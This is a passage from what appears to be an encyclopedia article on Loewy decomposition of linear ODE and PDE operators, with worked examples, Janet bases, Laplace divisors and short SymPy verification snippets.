If an operator is not completely reducible, the Lclm {\displaystyle \operatorname {Lclm} } of its irreducible right factors is divided out and the same procedure is repeated with the quotient . Due to the lowering of order in each step, this procedure terminates after a finite number of iterations, and the desired decomposition is obtained. Based on these considerations, Loewy [ 1 ] obtained the following fundamental result.
Theorem 1 (Loewy 1906) — Let D = d d x {\textstyle D={\frac {d}{dx}}} be a derivative and a i ∈ Q ( x ) {\displaystyle a_{i}\in \mathbb {Q} (x)} . A differential operator L ≡ D n + a 1 D n − 1 + ⋯ + a n − 1 D + a n {\displaystyle L\equiv D^{n}+a_{1}D^{n-1}+\cdots +a_{n-1}D+a_{n}} of order n {\displaystyle n} may be written uniquely as the product of completely reducible factors L k ( d k ) {\displaystyle L_{k}^{(d_{k})}} of maximal order d k {\displaystyle d_{k}} over Q ( x ) {\displaystyle \mathbb {Q} (x)} in the form L = L m ( d m ) L m − 1 ( d m − 1 ) … L 1 ( d 1 ) {\displaystyle L=L_{m}^{(d_{m})}L_{m-1}^{(d_{m-1})}\ldots L_{1}^{(d_{1})}} with d 1 + … + d m = n {\displaystyle d_{1}+\ldots +d_{m}=n} . The factors L k ( d k ) {\displaystyle L_{k}^{(d_{k})}} are unique. Any factor L k ( d k ) {\displaystyle L_{k}^{(d_{k})}} , k = 1 , … , m {\displaystyle k=1,\ldots ,m} may be written as L k ( d k ) = Lclm ( l j 1 ( e 1 ) , l j 2 ( e 2 ) , … , l j k ( e k ) ) {\displaystyle L_{k}^{(d_{k})}=\operatorname {Lclm} \left(l_{j_{1}}^{(e_{1})},l_{j_{2}}^{(e_{2})},\ldots ,l_{j_{k}}^{(e_{k})}\right)} with e 1 + e 2 + ⋯ + e k = d k {\displaystyle e_{1}+e_{2}+\dots +e_{k}=d_{k}} ; l j i ( e i ) {\displaystyle l_{j_{i}}^{(e_{i})}} for i = 1 , … , k {\displaystyle i=1,\ldots ,k} , denotes an irreducible operator of order e i {\displaystyle e_{i}} over Q ( x ) {\displaystyle \mathbb {Q} (x)} .
The decomposition determined in this theorem is called the Loewy decomposition of L {\displaystyle L} . It provides a detailed description of the function space containing the solution of a reducible linear differential equation L y = 0 {\displaystyle Ly=0} .
For operators of fixed order the possible Loewy decompositions, differing by the number and the order of factors, may be listed explicitly; some of the factors may contain parameters. Each alternative is called a type of Loewy decomposition . The complete answer for n = 2 {\displaystyle n=2} is detailed in the following corollary to the above theorem. [ 3 ]
Corollary 1 Let L {\displaystyle L} be a second-order operator. Its possible Loewy decompositions are denoted by L 0 2 , … , L 3 2 {\displaystyle {\mathcal {L}}_{0}^{2},\ldots ,{\mathcal {L}}_{3}^{2}} , they may be described as follows; l ( i ) {\displaystyle l^{(i)}} and l j ( i ) {\displaystyle l_{j}^{(i)}} are irreducible operators of order i {\displaystyle i} ; C {\displaystyle C} is a constant.
L 1 2 : L = l 2 ( 1 ) l 1 ( 1 ) ; L 2 2 : L = Lclm ( l 2 ( 1 ) , l 1 ( 1 ) ) ; L 3 2 : L = Lclm ( l ( 1 ) ( C ) ) . {\displaystyle {\begin{aligned}&{\mathcal {L}}_{1}^{2}:L=l_{2}^{(1)}l_{1}^{(1)};\\&{\mathcal {L}}_{2}^{2}:L=\operatorname {Lclm} \left(l_{2}^{(1)},l_{1}^{(1)}\right);\\&{\mathcal {L}}_{3}^{2}:L=\operatorname {Lclm} \left(l^{(1)}(C)\right).\end{aligned}}}
The decomposition type of an operator is the decomposition L i 2 {\displaystyle {\mathcal {L}}_{i}^{2}} with the highest value of i {\displaystyle i} . An irreducible second-order operator is defined to have decomposition type L 0 2 {\displaystyle {\mathcal {L}}_{0}^{2}} .
The decompositions L 0 2 {\displaystyle {\mathcal {L}}_{0}^{2}} , L 2 2 {\displaystyle {\mathcal {L}}_{2}^{2}} and L 3 2 {\displaystyle {\mathcal {L}}_{3}^{2}} are completely reducible.
If a decomposition of type L i 2 {\displaystyle {\mathcal {L}}_{i}^{2}} , i = 1 , 2 {\displaystyle i=1,2} or 3 {\displaystyle 3} has been obtained for a second-order equation L y = 0 {\displaystyle Ly=0} , a fundamental system may be given explicitly.
Corollary 2 Let L {\displaystyle L} be a second-order differential operator, D ≡ d d x {\textstyle D\equiv {\frac {d}{dx}}} , y {\displaystyle y} a differential indeterminate, and a i ∈ Q ( x ) {\displaystyle a_{i}\in \mathbb {Q} (x)} . Define ε i ( x ) ≡ exp ( − ∫ a i d x ) {\textstyle \varepsilon _{i}(x)\equiv \exp {\left(-\int a_{i}\,dx\right)}} for i = 1 , 2 {\displaystyle i=1,2} and ε ( x , C ) ≡ exp ( − ∫ a ( C ) d x ) {\textstyle \varepsilon (x,C)\equiv \exp {\left(-\int a(C)\,dx\right)}} , C {\displaystyle C} is a parameter ; the barred quantities C ¯ {\displaystyle {\bar {C}}} and C ¯ ¯ {\displaystyle {\bar {\bar {C}}}} are arbitrary numbers, C ¯ ≠ C ¯ ¯ {\displaystyle {\bar {C}}\neq {\bar {\bar {C}}}} . For the three nontrivial decompositions of Corollary 1 the following elements y 1 {\displaystyle y_{1}} and y 2 {\displaystyle y_{2}} of a fundamental system are obtained.
L 1 2 : L y = ( D + a 2 ) ( D + a 1 ) y = 0 ; {\displaystyle {\mathcal {L}}_{1}^{2}:Ly=(D+a_{2})(D+a_{1})y=0;} y 1 = ε 1 ( x ) , y 2 = ε 1 ( x ) ∫ ε 2 ( x ) ε 1 ( x ) d x . {\displaystyle y_{1}=\varepsilon _{1}(x),\quad y_{2}=\varepsilon _{1}(x)\int {\frac {\varepsilon _{2}(x)}{\varepsilon _{1}(x)}}\,dx.} L 2 2 : L y = Lclm ( D + a 2 , D + a 1 ) y = 0 ; {\displaystyle {\mathcal {L}}_{2}^{2}:Ly=\operatorname {Lclm} (D+a_{2},D+a_{1})y=0;} y i = ε i ( x ) ; {\displaystyle y_{i}=\varepsilon _{i}(x);}
a 1 {\displaystyle a_{1}} is not equivalent to a 2 {\displaystyle a_{2}} .
L 3 2 : L y = Lclm ( D + a ( C ) ) y = 0 ; {\displaystyle {\mathcal {L}}_{3}^{2}:Ly=\operatorname {Lclm} (D+a(C))y=0;} y 1 = ε ( x , C ¯ ) {\displaystyle y_{1}=\varepsilon (x,{\bar {C}})} y 2 = ε ( x , C ¯ ¯ ) . {\displaystyle y_{2}=\varepsilon (x,{\bar {\bar {C}}}).}
Here two rational functions p , q ∈ Q ( x ) {\displaystyle p,q\in \mathbb {Q} (x)} are called equivalent if there exists another rational function r ∈ Q ( x ) {\displaystyle r\in \mathbb {Q} (x)} such that p − q = r ′ r . {\displaystyle p-q={\frac {r'}{r}}.}
There remains the question of how to obtain a factorization for a given equation or operator. It turns out that for linear ODEs, finding the factors comes down to determining rational solutions of Riccati equations or linear ODEs; both may be determined algorithmically. The two examples below show how the above corollary is applied.
Example 1 Equation 2.201 from Kamke's collection [ 4 ] has the L 2 2 {\displaystyle {\mathcal {L}}_{2}^{2}} decomposition y ″ + ( 2 + 1 x ) y ′ − 4 x 2 y = Lclm ( D + 2 x − 2 x − 2 x 2 − 2 x + 3 2 , D + 2 + 2 x − 1 x + 3 2 ) y = 0. {\displaystyle y''+\left(2+{\frac {1}{x}}\right)y'-{\frac {4}{x^{2}}}y=\operatorname {Lclm} \left(D+{\frac {2}{x}}-{\frac {2x-2}{x^{2}-2x+{\frac {3}{2}}}},D+2+{\frac {2}{x}}-{\frac {1}{x+{\frac {3}{2}}}}\right)y=0.}
The coefficients a 1 = 2 + 2 x − 1 x + 3 2 {\textstyle a_{1}=2+{\frac {2}{x}}-{\frac {1}{x+{\frac {3}{2}}}}} and a 2 = 2 x − 2 x − 2 x 2 − 2 x + 3 2 {\textstyle a_{2}={\frac {2}{x}}-{\frac {2x-2}{x^{2}-2x+{\frac {3}{2}}}}} are rational solutions of the Riccati equation a ′ − a 2 + ( 2 + 1 x ) + 4 x 2 = 0 {\textstyle a'-a^{2}+\left(2+{\frac {1}{x}}\right)+{\frac {4}{x^{2}}}=0} , they yield the fundamental system y 1 = 2 3 − 4 3 x + 1 x 2 , {\displaystyle y_{1}={\frac {2}{3}}-{\frac {4}{3x}}+{\frac {1}{x^{2}}},} y 2 = 2 x + 3 x 2 e − 2 x . {\displaystyle y_{2}={\frac {2}{x}}+{\frac {3}{x^{2}}}e^{-2x}.}
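The fundamental system can be verified mechanically. A short SymPy sketch (not part of the source) substitutes y1 and y2 into the equation and simplifies the residuals to zero:

```python
import sympy as sp

x = sp.symbols('x')

def L(y):  # the operator of Example 1 applied to y
    return sp.diff(y, x, 2) + (2 + 1/x)*sp.diff(y, x) - 4/x**2*y

y1 = sp.Rational(2, 3) - sp.Rational(4, 3)/x + 1/x**2
y2 = (2/x + 3/x**2)*sp.exp(-2*x)
print(sp.simplify(L(y1)), sp.simplify(L(y2)))  # 0 0
```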
Example 2 An equation with a type L 3 2 {\displaystyle {\mathcal {L}}_{3}^{2}} decomposition is y ″ − 6 x 2 y = Lclm ( D + 2 x − 5 x 4 x 5 + C ) y = 0. {\displaystyle y''-{\frac {6}{x^{2}}}y=\operatorname {Lclm} \left(D+{\frac {2}{x}}-{\frac {5x^{4}}{x^{5}+C}}\right)y=0.}
The coefficient of the first-order factor is the rational solution of a ′ − a 2 + 6 x 2 = 0 {\textstyle a'-a^{2}+{\frac {6}{x^{2}}}=0} . Upon integration the fundamental system y 1 = x 3 {\textstyle y_{1}=x^{3}} and y 2 = 1 x 2 {\textstyle y_{2}={\frac {1}{x^{2}}}} for C = 0 {\displaystyle C=0} and C → ∞ {\displaystyle C\to \infty } respectively is obtained.
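Again a two-line SymPy check (a sketch, not part of the source) confirms the fundamental system of Example 2:

```python
import sympy as sp

x = sp.symbols('x')
for y in (x**3, 1/x**2):
    print(sp.simplify(sp.diff(y, x, 2) - 6/x**2*y))  # 0, 0
```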
These results show that factorization provides an algorithmic scheme for solving reducible linear ODEs. Whenever an equation of order 2 factorizes according to one of the types defined above, the elements of a fundamental system are explicitly known, i.e. factorization is equivalent to solving the equation.
A similar scheme may be set up for linear ODEs of any order, although the number of alternatives grows considerably with the order; for order n = 3 {\displaystyle n=3} the answer is given in full detail in [ 2 ] .
If an equation is irreducible, it may occur that its Galois group is nontrivial; then algebraic solutions may exist. [ 5 ] If the Galois group is trivial, it may be possible to express the solutions in terms of special functions such as Bessel or Legendre functions ; see [ 6 ] or [ 7 ] .
In order to generalize Loewy's result to linear PDEs it is necessary to apply the more general setting of differential algebra . Therefore, a few basic concepts that are required for this purpose are given next.
A field F {\displaystyle {\mathcal {F}}} is called a differential field if it is equipped with a derivation operator . An operator δ {\displaystyle \delta } on a field F {\displaystyle {\mathcal {F}}} is called a derivation operator if δ ( a + b ) = δ ( a ) + δ ( b ) {\displaystyle \delta (a+b)=\delta (a)+\delta (b)} and δ ( a b ) = δ ( a ) b + a δ ( b ) {\displaystyle \delta (ab)=\delta (a)b+a\delta (b)} for all elements a , b ∈ F {\displaystyle a,b\in {\mathcal {F}}} . A field with a single derivation operator is called an ordinary differential field ; if there is a finite set containing several commuting derivation operators the field is called a partial differential field .
Here differential operators with derivatives ∂ x = ∂ ∂ x {\textstyle \partial _{x}={\frac {\partial }{\partial x}}} and ∂ y = ∂ ∂ y {\textstyle \partial _{y}={\frac {\partial }{\partial y}}} with coefficients from some differential field are considered. Its elements have the form ∑ i , j r i , j ( x , y ) ∂ x i ∂ y j {\textstyle \sum _{i,j}r_{i,j}(x,y)\partial _{x}^{i}\partial _{y}^{j}} ; almost all coefficients r i , j {\displaystyle r_{i,j}} are zero. The coefficient field is called the base field . If constructive and algorithmic methods are the main issue it is Q ( x , y ) {\displaystyle \mathbb {Q} (x,y)} . The respective ring of differential operators is denoted by D = Q ( x , y ) [ ∂ x , ∂ y ] {\displaystyle {\mathcal {D}}=\mathbb {Q} (x,y)[\partial _{x},\partial _{y}]} or D = F [ ∂ x , ∂ y ] {\displaystyle {\mathcal {D}}={\mathcal {F}}[\partial _{x},\partial _{y}]} . The ring D {\displaystyle {\mathcal {D}}} is non-commutative, ∂ x a = a ∂ x + ∂ a ∂ x {\textstyle \partial _{x}a=a\partial _{x}+{\frac {\partial a}{\partial x}}} and similarly for the other variables; a {\displaystyle a} is from the base field.
For an operator L = ∑ i + j ≤ n r i , j ( x , y ) ∂ x i ∂ y j {\textstyle L=\sum _{i+j\leq n}r_{i,j}(x,y)\partial _{x}^{i}\partial _{y}^{j}} of order n {\displaystyle n} the symbol of L is the homogeneous algebraic polynomial symb ( L ) ≡ ∑ i + j = n r i , j ( x , y ) X i Y j {\textstyle \operatorname {symb} (L)\equiv \sum _{i+j=n}r_{i,j}(x,y)X^{i}Y^{j}} where X {\displaystyle X} and Y {\displaystyle Y} algebraic indeterminates.
Let I {\displaystyle I} be a left ideal which is generated by l i ∈ D {\displaystyle l_{i}\in {\mathcal {D}}} , i = 1 , … , p {\displaystyle i=1,\ldots ,p} . Then one writes I = ⟨ l 1 , … , l p ⟩ {\displaystyle I=\langle l_{1},\ldots ,l_{p}\rangle } . Because right ideals are not considered here, sometimes I {\displaystyle I} is simply called an ideal.
The relation between left ideals in D {\displaystyle {\mathcal {D}}} and systems of linear PDEs is established as follows. The elements l i ∈ D {\displaystyle l_{i}\in {\mathcal {D}}} are applied to a single differential indeterminate z {\displaystyle z} . In this way the ideal I = ⟨ l 1 , l 2 , … ⟩ {\displaystyle I=\langle l_{1},l_{2},\ldots \rangle } corresponds to the system of PDEs l 1 z = 0 {\displaystyle l_{1}z=0} , l 2 z = 0 , … {\displaystyle l_{2}z=0,\ldots } for the single function z {\displaystyle z} .
The generators of an ideal are highly non-unique; its members may be transformed in infinitely many ways by taking linear combinations of them or their derivatives without changing the ideal. Therefore, M. Janet [ 8 ] introduced a normal form for systems of linear PDEs (see Janet basis ). [ 9 ] They are the differential analog of Gröbner bases of commutative algebra (which were originally introduced by Bruno Buchberger ); [ 10 ] therefore they are also sometimes called differential Gröbner bases .
In order to generate a Janet basis, a ranking of derivatives must be defined. It is a total ordering such that for any derivatives δ {\displaystyle \delta } , δ 1 {\displaystyle \delta _{1}} and δ 2 {\displaystyle \delta _{2}} , and any derivation operator θ {\displaystyle \theta } the relations δ ⪯ θ δ {\displaystyle \delta \preceq \theta \delta } , and δ 1 ⪯ δ 2 → δ δ 1 ⪯ δ δ 2 {\displaystyle \delta _{1}\preceq \delta _{2}\rightarrow \delta \delta _{1}\preceq \delta \delta _{2}} are valid. Here graded lexicographic term orderings g r l e x {\displaystyle grlex} are applied. For partial derivatives of a single function their definition is analogous to the monomial orderings in commutative algebra . The S-pairs in commutative algebra correspond to the integrability conditions.
If it is assured that the generators l 1 , … , l p {\displaystyle l_{1},\ldots ,l_{p}} of an ideal I {\displaystyle I} form a Janet basis the notation I = ⟨ ⟨ l 1 , … , l p ⟩ ⟩ {\displaystyle I={{\big \langle }{\big \langle }}l_{1},\ldots ,l_{p}{{\big \rangle }{\big \rangle }}} is applied.
Example 3 Consider the ideal I = ⟨ l 1 ≡ ∂ x x − 1 x ∂ x − y x ( x + y ) ∂ y , l 2 ≡ ∂ x y + 1 x + y ∂ y , l 3 ≡ ∂ y y + 1 x + y ∂ y ⟩ {\displaystyle I={\Big \langle }l_{1}\equiv \partial _{xx}-{\frac {1}{x}}\partial _{x}-{\frac {y}{x(x+y)}}\partial _{y},\;l_{2}\equiv \partial _{xy}+{\frac {1}{x+y}}\partial _{y},\;l_{3}\equiv \partial _{yy}+{\frac {1}{x+y}}\partial _{y}{\Big \rangle }} in g r l e x {\displaystyle grlex} term order with x ≻ y {\displaystyle x\succ y} . Its generators are autoreduced. If the integrability condition l 1 , y = l 2 , x − l 2 , y = y + 2 x x ( x + y ) ∂ x y + y x ( x + y ) ∂ y y {\displaystyle l_{1,y}=l_{2,x}-l_{2,y}={\frac {y+2x}{x(x+y)}}\partial _{xy}+{\frac {y}{x(x+y)}}\partial _{yy}} is reduced with respect to I {\displaystyle I} , the new generator ∂ y {\displaystyle \partial _{y}} is obtained. Adding it to the generators and performing all possible reductions, the given ideal is represented as I = ⟨ ⟨ ∂ x x − 1 x ∂ x , ∂ y ⟩ ⟩ {\textstyle I=\left\langle \left\langle \partial _{xx}-{\frac {1}{x}}\partial _{x},\partial _{y}\right\rangle \right\rangle } .
Its generators are autoreduced and the single integrability condition is satisfied, i.e. they form a Janet basis.
Given any ideal I {\displaystyle I} it may occur that it is properly contained in some larger ideal J {\displaystyle J} with coefficients in the base field of I {\displaystyle I} ; then J {\displaystyle J} is called a divisor of I {\displaystyle I} . In general, a divisor in a ring of partial differential operators need not be principal.
The greatest common right divisor (Gcrd) or sum of two ideals I {\displaystyle I} and J {\displaystyle J} is the smallest ideal with the property that both I {\displaystyle I} and J {\displaystyle J} are contained in it. If they have the representation I ≡ ⟨ f 1 , … , f p ⟩ {\displaystyle I\equiv \langle f_{1},\ldots ,f_{p}\rangle } and J ≡ ⟨ g 1 , … , g q ⟩ , {\displaystyle J\equiv \langle g_{1},\ldots ,g_{q}\rangle ,} f i {\displaystyle f_{i}} , g j ∈ D {\displaystyle g_{j}\in {\mathcal {D}}} for all i {\displaystyle i} and j {\displaystyle j} , the sum is generated by the union of the generators of I {\displaystyle I} and J {\displaystyle J} . The solution space of the equations corresponding to Gcrd ( I , J ) {\displaystyle \operatorname {Gcrd} (I,J)} is the intersection of the solution spaces of its arguments.
The least common left multiple (Lclm) or left intersection of two ideals I {\displaystyle I} and J {\displaystyle J} is the largest ideal with the property that it is contained both in I {\displaystyle I} and J {\displaystyle J} . The solution space of Lclm ( I , J ) z = 0 {\displaystyle \operatorname {Lclm} (I,J)z=0} is the smallest space containing the solution spaces of its arguments.
A special kind of divisor is the so-called Laplace divisor of a given operator L {\displaystyle L} , [ 2 ] page 34. It is defined as follows.
Definition Let L {\displaystyle L} be a partial differential operator in the plane; define l m ≡ ∂ x m + a m − 1 ∂ x m − 1 + ⋯ + a 1 ∂ x + a 0 {\displaystyle {\mathfrak {l}}_{m}\equiv \partial _{x^{m}}+a_{m-1}\partial _{x^{m-1}}+\dots +a_{1}\partial _{x}+a_{0}} and k n ≡ ∂ y n + b n − 1 ∂ y n − 1 + ⋯ + b 1 ∂ y + b 0 {\displaystyle {\mathfrak {k}}_{n}\equiv \partial _{y^{n}}+b_{n-1}\partial _{y^{n-1}}+\dots +b_{1}\partial _{y}+b_{0}} be ordinary differential operators with respect to x {\displaystyle x} or y {\displaystyle y} ; a i , b i ∈ Q ( x , y ) {\displaystyle a_{i},b_{i}\in \mathbb {Q} (x,y)} for all i; m {\displaystyle m} and n {\displaystyle n} are natural numbers not less than 2. Assume the coefficients a i {\displaystyle a_{i}} , i = 0 , … , m − 1 {\displaystyle i=0,\ldots ,m-1} are such that L {\displaystyle L} and l m {\displaystyle {\mathfrak {l}}_{m}} form a Janet basis. If m {\displaystyle m} is the smallest integer with this property then L x m ( L ) ≡ ⟨ ⟨ L , l m ⟩ ⟩ {\displaystyle \mathbb {L} _{x^{m}}(L)\equiv {\langle \langle }L,{\mathfrak {l}}_{m}{\rangle \rangle }} is called a Laplace divisor of L {\displaystyle L} . Similarly, if b j {\displaystyle b_{j}} , j = 0 , … , n − 1 {\displaystyle j=0,\ldots ,n-1} are such that L {\displaystyle L} and k n {\displaystyle {\mathfrak {k}}_{n}} form a Janet basis and n {\displaystyle n} is minimal, then L y n ( L ) ≡ ⟨ ⟨ L , k n ⟩ ⟩ {\displaystyle \mathbb {L} _{y^{n}}(L)\equiv {\langle \langle }L,{\mathfrak {k}}_{n}{\rangle \rangle }} is also called a Laplace divisor of L {\displaystyle L} .
In order for a Laplace divisor to exist, the coefficients of an operator L {\displaystyle L} must obey certain constraints. [ 3 ] An algorithm for determining an upper bound for a Laplace divisor is not known at present; therefore, in general the existence of a Laplace divisor may be undecidable.
Applying the above concepts Loewy's theory may be generalized to linear PDEs. Here it is applied to individual linear PDEs of second order in the plane with coordinates x {\displaystyle x} and y {\displaystyle y} , and the principal ideals generated by the corresponding operators.
Second-order equations have been considered extensively in the literature of the 19th century. [ 11 ] [ 12 ] Usually equations with leading derivatives ∂ x x {\displaystyle \partial _{xx}} or ∂ x y {\displaystyle \partial _{xy}} are distinguished. Their general solutions contain not only constants but undetermined functions of varying numbers of arguments; determining them is part of the solution procedure. For equations with leading derivative ∂ x x {\displaystyle \partial _{xx}} Loewy's results may be generalized as follows.
Theorem 2 Let the differential operator L {\displaystyle L} be defined by L ≡ ∂ x x + A 1 ∂ x y + A 2 ∂ y y + A 3 ∂ x + A 4 ∂ y + A 5 {\displaystyle L\equiv \partial _{xx}+A_{1}\partial _{xy}+A_{2}\partial _{yy}+A_{3}\partial _{x}+A_{4}\partial _{y}+A_{5}} where A i ∈ Q ( x , y ) {\displaystyle A_{i}\in \mathbb {Q} (x,y)} for all i {\displaystyle i} .
Let l i ≡ ∂ x + a i ∂ y + b i {\displaystyle l_{i}\equiv \partial _{x}+a_{i}\partial _{y}+b_{i}} for i = 1 {\displaystyle i=1} and i = 2 {\displaystyle i=2} , and l ( Φ ) ≡ ∂ x + a ∂ y + b ( Φ ) {\displaystyle l(\Phi )\equiv \partial _{x}+a\partial _{y}+b(\Phi )} be first-order operators with a i , b i , a ∈ Q ( x , y ) {\displaystyle a_{i},b_{i},a\in \mathbb {Q} (x,y)} ; Φ {\displaystyle \Phi } is an undetermined function of a single argument. Then L {\displaystyle L} has a Loewy decomposition according to one of the following types.
The decomposition type of an operator L {\displaystyle L} is the decomposition L x x i {\displaystyle {\mathcal {L}}_{xx}^{i}} with the highest value of i {\displaystyle i} . If L {\displaystyle L} does not have any first-order factor in the base field, its decomposition type is defined to be L x x 0 {\displaystyle {\mathcal {L}}_{xx}^{0}} . Decompositions L x x 0 {\displaystyle {\mathcal {L}}_{xx}^{0}} , L x x 2 {\displaystyle {\mathcal {L}}_{xx}^{2}} and L x x 3 {\displaystyle {\mathcal {L}}_{xx}^{3}} are completely reducible.
In order to apply this result for solving any given differential equation involving the operator L {\displaystyle L} the question arises whether its first-order factors may be determined algorithmically. The subsequent corollary provides the answer for factors with coefficients either in the base field or a universal field extension.
Corollary 3 In general, first-order right factors of a linear PDE in the base field cannot be determined algorithmically. If the symbol polynomial is separable, any factor may be determined. If it has a double root, in general it is not possible to determine the right factors in the base field. The existence of factors in a universal field, i.e. absolute irreducibility, may always be decided.
The above theorem may be applied for solving reducible equations in closed form. Because only principal divisors are involved, the answer is similar to that for ordinary second-order equations.
Proposition 1 Let L z ≡ z x x + A 1 z x y + A 2 z y y + A 3 z x + A 4 z y + A 5 z = 0 {\displaystyle Lz\equiv z_{xx}+A_{1}z_{xy}+A_{2}z_{yy}+A_{3}z_{x}+A_{4}z_{y}+A_{5}z=0} be a reducible second-order equation, where A 1 , … , A 5 ∈ Q ( x , y ) {\displaystyle A_{1},\ldots ,A_{5}\in \mathbb {Q} (x,y)} .
Define l i ≡ ∂ x + a i ∂ y + b i {\displaystyle l_{i}\equiv \partial _{x}+a_{i}\partial _{y}+b_{i}} , a i , b i ∈ Q ( x , y ) {\displaystyle a_{i},b_{i}\in \mathbb {Q} (x,y)} for i = 1 , 2 {\displaystyle i=1,2} ; φ i ( x , y ) = c o n s t {\displaystyle \varphi _{i}(x,y)=\mathrm {const} } is a rational first integral of d y d x = a i ( x , y ) {\displaystyle {\frac {dy}{dx}}=a_{i}(x,y)} ; y ¯ ≡ φ i ( x , y ) {\displaystyle {\bar {y}}\equiv \varphi _{i}(x,y)} and the inverse y = ψ i ( x , y ¯ ) {\displaystyle y=\psi _{i}(x,{\bar {y}})} ; both φ i {\displaystyle \varphi _{i}} and ψ i {\displaystyle \psi _{i}} are assumed to exist. Furthermore, define E i ( x , y ) ≡ exp ( − ∫ b i ( x , y ) | y = ψ i ( x , y ¯ ) d x ) | y ¯ = φ i ( x , y ) {\displaystyle {\mathcal {E}}_{i}(x,y)\equiv \left.\exp \left(-\int b_{i}(x,y){\big |}_{y=\psi _{i}(x,{\bar {y}})}dx\right)\right|_{{\bar {y}}=\varphi _{i}(x,y)}} for i = 1 , 2 {\displaystyle i=1,2} .
A differential fundamental system has the following structure for the various decompositions into first-order components.
L x x 1 : z 1 ( x , y ) = E 1 ( x , y ) F 1 ( φ 1 ) , {\displaystyle {\mathcal {L}}_{xx}^{1}:z_{1}(x,y)={\mathcal {E}}_{1}(x,y)F_{1}(\varphi _{1}),} z 2 ( x , y ) = E 1 ( x , y ) ∫ E 2 ( x , y ) E 1 ( x , y ) F 2 ( φ 2 ( x , y ) ) | y = ψ 1 ( x , y ¯ ) d x | y ¯ = φ 1 ( x , y ) ; {\displaystyle z_{2}(x,y)={\mathcal {E}}_{1}(x,y){\displaystyle \int }{\frac {{\mathcal {E}}_{2}(x,y)}{{\mathcal {E}}_{1}(x,y)}}F_{2}{\big (}\varphi _{2}(x,y){\big )}{\big |}_{y=\psi _{1}(x,{\bar {y}})}dx{\Big |}_{{\bar {y}}=\varphi _{1}(x,y)};} L x x 2 : z i ( x , y ) = E i ( x , y ) F i ( φ i ( x , y ) ) , i = 1 , 2 ; {\displaystyle {\mathcal {L}}_{xx}^{2}:z_{i}(x,y)={\mathcal {E}}_{i}(x,y)F_{i}{\big (}\varphi _{i}(x,y){\big )},i=1,2;} L x x 3 : z i ( x , y ) = E i ( x , y ) F i ( φ ( x , y ) ) , i = 1 , 2. {\displaystyle {\mathcal {L}}_{xx}^{3}:z_{i}(x,y)={\mathcal {E}}_{i}(x,y)F_{i}{\big (}\varphi (x,y){\big )},i=1,2.}
The F i {\displaystyle F_{i}} are undetermined functions of a single argument; φ {\displaystyle \varphi } , φ 1 {\displaystyle \varphi _{1}} and φ 2 {\displaystyle \varphi _{2}} are rational in all arguments; ψ 1 {\displaystyle \psi _{1}} is assumed to exist. In general φ 1 ≠ φ 2 {\displaystyle \varphi _{1}\neq \varphi _{2}} ; they are determined by the coefficients A 1 {\displaystyle A_{1}} , A 2 {\displaystyle A_{2}} and A 3 {\displaystyle A_{3}} of the given equation.
A typical example of a linear PDE to which factorization applies is an equation discussed by Forsyth, [ 13 ] vol. VI, page 16,
Example 5 (Forsyth 1906)
Consider the differential equation z x x − z y y + 4 x + y z x = 0 {\textstyle z_{xx}-z_{yy}+{\frac {4}{x+y}}z_{x}=0} . Upon factorization the representation L z ≡ l 2 l 1 z = ( ∂ x + ∂ y + 2 x + y ) ( ∂ x − ∂ y + 2 x + y ) z = 0 {\displaystyle Lz\equiv l_{2}l_{1}z=\left(\partial _{x}+\partial _{y}+{\frac {2}{x+y}}\right)\left(\partial _{x}-\partial _{y}+{\frac {2}{x+y}}\right)z=0} is obtained. There follows φ 1 ( x , y ) = x + y , ψ 1 ( x , y ) = y ¯ − x , E 1 ( x , y ) = exp ( 2 y x + y ) , {\displaystyle \varphi _{1}(x,y)=x+y,\psi _{1}(x,y)={\bar {y}}-x,{\mathcal {E}}_{1}(x,y)=\exp {\left({\frac {2y}{x+y}}\right)},} φ 2 ( x , y ) = x − y , ψ 2 ( x , y ) = x − y ¯ , E 2 ( x , y ) = − 1 x + y . {\displaystyle \varphi _{2}(x,y)=x-y,\psi _{2}(x,y)=x-{\bar {y}},{\mathcal {E}}_{2}(x,y)=-{\frac {1}{x+y}}.}
Consequently, a differential fundamental system is
z 1 ( x , y ) = exp ( 2 y x + y ) F ( x + y ) , {\displaystyle z_{1}(x,y)=\exp {\left({\frac {2y}{x+y}}\right)}F(x+y),} z 2 ( x , y ) = 1 x + y exp ( 2 y x + y ) ∫ exp ( 2 x − y ¯ y ¯ ) G ( 2 x − y ¯ ) d x | y ¯ = x + y . {\displaystyle z_{2}(x,y)={\frac {1}{x+y}}\exp {\left({\frac {2y}{x+y}}\right)}\int \exp {\left({\frac {2x-{\bar {y}}}{\bar {y}}}\right)}G(2x-{\bar {y}})dx{\Big |}_{{\bar {y}}=x+y}.}
F {\displaystyle F} and G {\displaystyle G} are undetermined functions.
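Because F and G are arbitrary, the verification must be symbolic in an undetermined function. A SymPy sketch (not part of the source) for the first element of the fundamental system; the residual simplifies to zero for arbitrary F:

```python
import sympy as sp

x, y = sp.symbols('x y')
F = sp.Function('F')

z1 = sp.exp(2*y/(x + y)) * F(x + y)
residual = (sp.diff(z1, x, 2) - sp.diff(z1, y, 2)
            + 4/(x + y)*sp.diff(z1, x))
print(sp.simplify(residual))  # 0, for an arbitrary function F
```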
If the only second-order derivative of an operator is ∂ x y {\displaystyle \partial _{xy}} , its possible decompositions involving only principal divisors may be described as follows.
Theorem 3 Let the differential operator L {\displaystyle L} be defined by L ≡ ∂ x y + A 1 ∂ x + A 2 ∂ y + A 3 {\displaystyle L\equiv \partial _{xy}+A_{1}\partial _{x}+A_{2}\partial _{y}+A_{3}} where A i ∈ Q ( x , y ) {\displaystyle A_{i}\in \mathbb {Q} (x,y)} for all i {\displaystyle i} .
Let l ≡ ∂ x + A 2 {\displaystyle l\equiv \partial _{x}+A_{2}} and k ≡ ∂ y + A 1 {\displaystyle k\equiv \partial _{y}+A_{1}} be first-order operators. L {\displaystyle L} has Loewy decompositions involving first-order principal divisors of the following form.
The decomposition type of an operator L {\displaystyle L} is the decomposition L x y i {\displaystyle {\mathcal {L}}_{xy}^{i}} with the highest value of i {\displaystyle i} . The decomposition of type L x y 3 {\displaystyle {\mathcal {L}}_{xy}^{3}} is completely reducible.
In addition there are five more possible decomposition types involving non-principal Laplace divisors as shown next.
Theorem 4 Let the differential operator L {\displaystyle L} be defined by L ≡ ∂ x y + A 1 ∂ x + A 2 ∂ y + A 3 {\displaystyle L\equiv \partial _{xy}+A_{1}\partial _{x}+A_{2}\partial _{y}+A_{3}} where A i ∈ Q ( x , y ) {\displaystyle A_{i}\in \mathbb {Q} (x,y)} for all i {\displaystyle i} .
